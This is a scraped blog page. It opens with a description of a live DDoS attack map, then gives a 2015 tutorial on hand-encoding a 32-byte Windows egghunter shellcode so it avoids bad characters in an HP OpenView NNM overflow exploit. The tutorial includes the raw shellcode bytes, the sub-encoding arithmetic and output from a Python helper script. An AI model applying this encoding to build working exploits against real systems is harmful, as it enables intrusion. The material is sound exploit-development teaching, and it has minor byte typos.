Live Ddos View

Live DDoS Attack Map | Apakau

Live DDoS Attack Map

This map is the fruit of collaboration between Google Ideas and Arbor Networks in an effort to raise awareness about distributed denial of service attacks in the world everyday.

Exploring the Data

The Digital Attack Map displays global DDoS activity on any given day. Attacks are displayed as dotted lines, scaled to size, and placed according to the source and destination countries of the attack traffic when known. Some features include:

  • Use the histogram at the bottom of the map to explore historical data.
  • Select a country to view DDoS activity to or from that country.
  • Use the color option to view attacks by class, duration, or source/destination port.
  • Use the news section to find online reports of attack activity from a specified time.
  • View the gallery to explore some examples of days with notable DDoS attacks.

Sign Up

Monday, June 1, 2015

Manual Egghunter/Shellcode Encoding using Python

You are probably wondering what this post is all about, well….it’s about manually encoding egghunter shellcode
why would you want to manually encode the shellcode if you have built in encoders in the metasploit framework ?
Before we begin have a look at the following exploit by muts : HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit
I wont go into much details about the process because most of it already been discussed on theOffensive Security HP NNM 0day Presentation , and on the Peter Van Eeckhoutte’s Blog – Exploit writing tutorial part 8 : Win32 Egg Hunting at the “Hand-crafting the encoder” and “Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder ? “sections of the tutorial.
What  I’m about to show here  is the calculations made in order for our shellcode to be bad chars free, well, doing it manually can can be a pain….
Due to large amount of bad characters we need to manually encode the egghunter using a limited allowed set of chars, using python we can have a script  doing the calculations for us.
again, I assume you watched the offsec video and read  the tutorials and already know what we are about to do here.
Detailed  information about egghunters can be found in this document by skape :
1. Get the egghunter source code here: http://www.hick.org/code/skape/shellcode/win32/
or get them compiled to binaries here:
Egghunter
TitleEgghunter (797 clicks) 
Caption: Compiled Egg 
Filename: egghunt.exe 
Size: 52 kB
egghunt_syscall
Titleegghunt_syscall (798 clicks) 
Caption: Compiled syscall egg 
Filename: egghunt_syscall.exe 
Size: 52 kB
2. Generate the egghunter shellcode
C:\>egghunt.exe cstyle 0x57303054
// 32 byte egghunt shellcode (egg=0x57303054)
unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xe\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
3. breaking down our 32 byte egghunter shellcode  into 8 sets of 4 bytes
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30"
"\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"
4. We will use the following value as an example:
"\x0f\x42\x52\x6a"
0xFFFFFFFF – 0x6a52420f + 1 = 0x95ADBDF1
We need to find three numbers (from the  allowed character set) which when added, will give  0x95ADBDF1
Instead of calculating this manually  we will use a custom made python script
Now lets split it in two: 95AD, BDF1 and feed these values into our script:
* The script contains a list of allowed chras and will use it for its calculations
exploit~#python encoder.py
Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD
Got It!!
0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1
Got It!!
0x7f7f 0x3d71 0x0101
7f7f7f7f
152d3d71
01010101
Let’s add our results and viola, we now have values made from the allowed char set only:
7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1


Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)